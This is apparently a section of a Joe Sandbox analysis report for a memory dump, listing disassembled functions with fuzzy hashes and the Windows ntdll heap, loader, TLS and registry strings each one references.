                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                            • API String ID: 0-336120773
                                            • Opcode ID: ad512ccd168d84bbd30b574f1ad482070dd8edf90e99c8437f83ed61e278e81c
                                            • Instruction ID: c68c41394dd0e3a6347ffada408dc00bf652de284b4066f6ab9894e5b51439b1
                                            • Opcode Fuzzy Hash: ad512ccd168d84bbd30b574f1ad482070dd8edf90e99c8437f83ed61e278e81c
                                            • Instruction Fuzzy Hash: 6631DE76510214EFE701DBE9DC80F967BE8EF4A768F5000A5E901DB291EA35EC41CEA5
                                            Function 36949148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                            • API String ID: 0-1391187441
                                            • Opcode ID: 36276f10aad27a50eac4f049ab520e9260321dbf1882b09a626f46b40dce7ad9
                                            • Instruction ID: 929280d35bc3f6f75bc334c82241a80e728218b69efa43d44f0febc7990ccbad
                                            • Opcode Fuzzy Hash: 36276f10aad27a50eac4f049ab520e9260321dbf1882b09a626f46b40dce7ad9
                                            • Instruction Fuzzy Hash: 4A31CF76A10218EFD702DB95CC88F9AB7FDEF49774F204091E914AB295DB34ED40CA61
                                            Function 36957152 Relevance: 4.7, APIs: 3, Instructions: 158timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID:
                                            • API String ID: 3446177414-0
                                            • Opcode ID: a8868bf1591fa86d0d6b45dbe41565c2ea42b22ed2c91a4a14be5b9cb6fbb6d5
                                            • Instruction ID: fe678c462bdc275542698e82460f903587b1b3404a3783f2cb0bc61274dfe51e
                                            • Opcode Fuzzy Hash: a8868bf1591fa86d0d6b45dbe41565c2ea42b22ed2c91a4a14be5b9cb6fbb6d5
                                            • Instruction Fuzzy Hash: 89510F34E10715EFFB05CB64CD98BADBBB9BF04354F214069E6029B290DBB09A02CBD1
                                            Function 369F7F3E Relevance: 4.6, APIs: 3, Instructions: 85timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID:
                                            • API String ID: 3446177414-0
                                            • Opcode ID: 5ba7b41c21894114f9c51c30ae6b991cb983315b0c007c62864f4d9afc45d536
                                            • Instruction ID: 61816e117dd18382d898e25a1e0ad4cb4da415896ce2b98dba32dbe9e975107b
                                            • Opcode Fuzzy Hash: 5ba7b41c21894114f9c51c30ae6b991cb983315b0c007c62864f4d9afc45d536
                                            • Instruction Fuzzy Hash: B43113B5E1421A8BDB41CF99D848ADDFBB5BF48351F25806AE811BB310CB769C42DF60
                                            Function 36961F92 Relevance: 4.3, Strings: 3, Instructions: 563COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                            • API String ID: 0-3178619729
                                            • Opcode ID: 4dd227a8af12d6a2517d6c2276a2ae0c87205ba713112dd56585fa073909650a
                                            • Instruction ID: 7794c45e0d1a29c96afe0cd637e7a2dc2d37c03b8a2eac9e0233db8f0f879877
                                            • Opcode Fuzzy Hash: 4dd227a8af12d6a2517d6c2276a2ae0c87205ba713112dd56585fa073909650a
                                            • Instruction Fuzzy Hash: 20220474A00346EFEB11CF26C890B7ABBF9FF45718F248499E4458B286D735E882CB51
                                            Function 36951460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                            Download Yara Rule
                                            Strings
                                            • HEAP: , xrefs: 36951596
                                            • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 36951728
                                            • HEAP[%wZ]: , xrefs: 36951712
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                            • API String ID: 0-3178619729
                                            • Opcode ID: 11cd2265d9fd1f96d8eda8ae3217cdb2f5b07144d1bc20f59df78f473fb0cf9c
                                            • Instruction ID: 9d77bc1b0b524a5e08b49ff6329a29dc37922ed3b9b8faf8833a64005ef4e889
                                            • Opcode Fuzzy Hash: 11cd2265d9fd1f96d8eda8ae3217cdb2f5b07144d1bc20f59df78f473fb0cf9c
                                            • Instruction Fuzzy Hash: A2E1FF74A043559FEB15CF28C890B7ABBF5EF48308F25845DEA96CB246DB34E941CB90
                                            Function 3695B6C0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                            • API String ID: 0-1145731471
                                            • Opcode ID: 488fc1b75348e3ee42ecb5288838fe389ab132c50247cd39a2cde7f7b03f2642
                                            • Instruction ID: ce5494d72da42e79ecc4bec7f3a411ef61236d51a35809a7842a816dc7e641d6
                                            • Opcode Fuzzy Hash: 488fc1b75348e3ee42ecb5288838fe389ab132c50247cd39a2cde7f7b03f2642
                                            • Instruction Fuzzy Hash: 6CB10F75E147199FEB25CF6AC8A0B9DB3B6BF48394F254429E911EB384D770E840CB42
                                            Function 369D368C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                            • API String ID: 0-2391371766
                                            • Opcode ID: 771268e746b63c00978f2f07b840dca583bb2d2c6f9a39a964303484c334355c
                                            • Instruction ID: ea267bffb3ce8417346bff0b1dfce0c549eb07f46712184748d1d8de3391e552
                                            • Opcode Fuzzy Hash: 771268e746b63c00978f2f07b840dca583bb2d2c6f9a39a964303484c334355c
                                            • Instruction Fuzzy Hash: 82B1BFB1A04345AFE711CF55CC80B5BB7E8EB4A765F508839FA40AB241D775EC05CB92
                                            Function 369E36EE Relevance: 4.0, Strings: 3, Instructions: 236COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                            • API String ID: 0-318774311
                                            • Opcode ID: 9bb81d334c9be52702547366c9e60676b5ba62065c3706feac4a4e9469480079
                                            • Instruction ID: 8b98d4a7317cf3539091b55df0465a5429a580db93c1db36865709a09b583896
                                            • Opcode Fuzzy Hash: 9bb81d334c9be52702547366c9e60676b5ba62065c3706feac4a4e9469480079
                                            • Instruction Fuzzy Hash: 71818DB5608350EFE312CB16C840B6AB7E8FF89794F501929F990DB391DB75D904CB92
                                            Function 369D7410 Relevance: 4.0, Strings: 3, Instructions: 233COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Objects=%4u$Objects>%4u$VirtualAlloc
                                            • API String ID: 0-3870751728
                                            • Opcode ID: 160fa3945953317d88a07559e37b8f651dff77b29c23351a272aaf59d1acda0a
                                            • Instruction ID: a59826fb684513a67b1c768d31d56c777db2d74726d4e3a4f0267b832260d2b9
                                            • Opcode Fuzzy Hash: 160fa3945953317d88a07559e37b8f651dff77b29c23351a272aaf59d1acda0a
                                            • Instruction Fuzzy Hash: 8B914BB4E002159FEB14CFA9C884B9DBBF1FF48314F24C16AE905AB291E7759842CF91
                                            Function 3695B440 Relevance: 4.0, Strings: 3, Instructions: 221COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                            • API String ID: 0-373624363
                                            • Opcode ID: 48bad8aeee8718c403aea0178611e5cb5811cfac2b8b70825b4190a212e12cf1
                                            • Instruction ID: c504e20ef5c89005dda2225c1d94970fe0219724fd48621b3fa55169cdddd4b2
                                            • Opcode Fuzzy Hash: 48bad8aeee8718c403aea0178611e5cb5811cfac2b8b70825b4190a212e12cf1
                                            • Instruction Fuzzy Hash: 2991DFB5E01319CFEF21CF55D8A0BAE77B4EF05364F224195E900AB294D7B89E81CB91
                                            Function 3698909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: %$&$@
                                            • API String ID: 0-1537733988
                                            • Opcode ID: a8ee8191d2a8e5998ca04a4b54eb67d9f42b6714b929a78bc2a471dacea56ce4
                                            • Instruction ID: ece15c6d28648a2c6d3374b92b479f0ba1c7192e1ee13b04e97d7de4d20a1ed8
                                            • Opcode Fuzzy Hash: a8ee8191d2a8e5998ca04a4b54eb67d9f42b6714b929a78bc2a471dacea56ce4
                                            • Instruction Fuzzy Hash: 9C71AE74A0C3019FE710CF29C980A5BBBEDBF85758F208A1DE49987691D735D906CB93
                                            Function 36A2B73C Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                            Download Yara Rule
                                            Strings
                                            • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 36A2B82A
                                            • TargetNtPath, xrefs: 36A2B82F
                                            • GlobalizationUserSettings, xrefs: 36A2B834
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                            • API String ID: 0-505981995
                                            • Opcode ID: 3cc591df1348f295631b8ef6c8d88430f06328cd01ca48a09d0add03fee967a1
                                            • Instruction ID: a32002891d8c8af8dd52e98750a020a61c42b5e2164e3568bdf57a99b0c02b83
                                            • Opcode Fuzzy Hash: 3cc591df1348f295631b8ef6c8d88430f06328cd01ca48a09d0add03fee967a1
                                            • Instruction Fuzzy Hash: B5617D72D41229AFDB21DB55DC88B9AB7F9AF14728F4101E5E908AB250DB34DE84CF90
                                            Function 3694F7BA Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                            Download Yara Rule
                                            Strings
                                            • HEAP: , xrefs: 369AE6B3
                                            • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 369AE6C6
                                            • HEAP[%wZ]: , xrefs: 369AE6A6
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                            • API String ID: 0-1340214556
                                            • Opcode ID: 88dce1fa79584782bd4048fe42561e8e37c580a15b9b86d2d231172a158037b3
                                            • Instruction ID: 87dd36d804e55ab0685ae8365358055b7262815a2ef92632bf6181805234aa96
                                            • Opcode Fuzzy Hash: 88dce1fa79584782bd4048fe42561e8e37c580a15b9b86d2d231172a158037b3
                                            • Instruction Fuzzy Hash: 9F51F375A00B45EFE312DBA9C994FAABBF8EF45344F1000A5EA418B792D734ED40DB51
                                            Function 369715F4 Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                            Download Yara Rule
                                            Strings
                                            • minkernel\ntdll\ldrmap.c, xrefs: 369BA59A
                                            • Could not validate the crypto signature for DLL %wZ, xrefs: 369BA589
                                            • LdrpCompleteMapModule, xrefs: 369BA590
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                            • API String ID: 0-1676968949
                                            • Opcode ID: ac20f38243552dfbe644c1f55239072aa88b87e18a79a7df906d6ad9ac29bbd7
                                            • Instruction ID: bca472700a94164d6125b51af02e5d37a93274f88031d48045f36896810929c7
                                            • Opcode Fuzzy Hash: ac20f38243552dfbe644c1f55239072aa88b87e18a79a7df906d6ad9ac29bbd7
                                            • Instruction Fuzzy Hash: 7D5104B4A00745DBFB21CB19CD44B0A7FE8EF00758F280165E9509B6E2DBB4EE41C795
                                            Function 3694758F Relevance: 3.9, Strings: 3, Instructions: 132COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                            • API String ID: 0-1151232445
                                            • Opcode ID: e9bcb62cac35c26ea106f5a3f65f7c4716f92cfc201e78048d0f932bd0c0a787
                                            • Instruction ID: 32b4de69a581743c9b9718ecbbb9b42155a52f6304fcb8661d4be8bf3ae17d92
                                            • Opcode Fuzzy Hash: e9bcb62cac35c26ea106f5a3f65f7c4716f92cfc201e78048d0f932bd0c0a787
                                            • Instruction Fuzzy Hash: D3417AB4B003C48FFB2ADE1DC98876977EA9F05398F74406DD4458F246DAB4D886CB52
                                            Function 369816CF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                            Download Yara Rule
                                            Strings
                                            • LdrpAllocateTls, xrefs: 369C1B40
                                            • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 369C1B39
                                            • minkernel\ntdll\ldrtls.c, xrefs: 369C1B4A
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                            • API String ID: 0-4274184382
                                            • Opcode ID: 69ba994ea25fd93eac5d67d954214e0fc6e14614898708476ba0b354f1ad4edf
                                            • Instruction ID: f2dc7d386fa52ba634afcb98b8966fb0423d018363cb6e70dbfb6ddb5b83b832
                                            • Opcode Fuzzy Hash: 69ba994ea25fd93eac5d67d954214e0fc6e14614898708476ba0b354f1ad4edf
                                            • Instruction Fuzzy Hash: B04176B5E00609EFDB15CFA9CC40AAEBBF6FF88314F508129E506A7351DB35A901CB91
                                            Function 369833A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                            Download Yara Rule
                                            Strings
                                            • SXS: %s() passed the empty activation context data, xrefs: 369C29FE
                                            • RtlCreateActivationContext, xrefs: 369C29F9
                                            • Actx , xrefs: 369833AC
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                            • API String ID: 0-859632880
                                            • Opcode ID: ddb804ddba3468d34acbd0a5b4f69f6fbde6d4d3c0fca667e414908b6aff21f6
                                            • Instruction ID: 4646eee26f5296e53f3331c533e323118e7b598a2b46c9d903df15767e1cc596
                                            • Opcode Fuzzy Hash: ddb804ddba3468d34acbd0a5b4f69f6fbde6d4d3c0fca667e414908b6aff21f6
                                            • Instruction Fuzzy Hash: 9A3148326003159FEB16CFAADC80F9637A8EB88724F614469ED089F292CB35DC51C791
                                            Function 369DB594 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                                            Download Yara Rule
                                            Strings
                                            • @, xrefs: 369DB670
                                            • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 369DB632
                                            • GlobalFlag, xrefs: 369DB68F
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                            • API String ID: 0-4192008846
                                            • Opcode ID: fbffb8fc5123e59f7bb7f9eb2427d6dfc13e6cda170c919bf3cc065e9317d1b4
                                            • Instruction ID: 7f4ba28501c2d071fbbd2a1b1aaa1024ddc4c388178030a345029f0011fa9a88
                                            • Opcode Fuzzy Hash: fbffb8fc5123e59f7bb7f9eb2427d6dfc13e6cda170c919bf3cc065e9317d1b4
                                            • Instruction Fuzzy Hash: BE315AB5D00219AFDF00DF95DC80AEEBBBCEF44754F904479EA05A7151D7349A04CBA4
                                            Function 369F13B9 Relevance: 3.9, Strings: 3, Instructions: 101COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$OsBootstatPath$\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control
                                            • API String ID: 0-1050206962
                                            • Opcode ID: 38562abf7a39823f53bf6bb2d0a4274ce631067f25d12c6c669d532797cab5eb
                                            • Instruction ID: deaedd6ad3571434333b20c1c00db2c191b1a260d0ef134b9e665b8167eebf4f
                                            • Opcode Fuzzy Hash: 38562abf7a39823f53bf6bb2d0a4274ce631067f25d12c6c669d532797cab5eb
                                            • Instruction Fuzzy Hash: EC316B72D10219AFEB11CF95CC84EEEBBBDEB84658F420465EA04AB211D739DD048BE1
                                            Function 36981607 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                            Download Yara Rule
                                            Strings
                                            • LdrpInitializeTls, xrefs: 369C1A47
                                            • DLL "%wZ" has TLS information at %p, xrefs: 369C1A40
                                            • minkernel\ntdll\ldrtls.c, xrefs: 369C1A51
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                            • API String ID: 0-931879808
                                            • Opcode ID: 395ae9862c609f8c252a1176ca38fab596393d385fa46d6a34e2ae9162c02cbe
                                            • Instruction ID: 616c268b82487f3a0d1573949de4fb2be2193515e79adcb66fd5cd89acc46a6a
                                            • Opcode Fuzzy Hash: 395ae9862c609f8c252a1176ca38fab596393d385fa46d6a34e2ae9162c02cbe
                                            • Instruction Fuzzy Hash: 8631E271A10302EBF711CB49CC45F6A7BB9AB84354F250169EA45B7290DB70AD46C791
                                            Function 36991270 Relevance: 3.8, Strings: 3, Instructions: 97COMMON
                                            Download Yara Rule
                                            Strings
                                            • @, xrefs: 369912A5
                                            • BuildLabEx, xrefs: 3699130F
                                            • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 3699127B
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
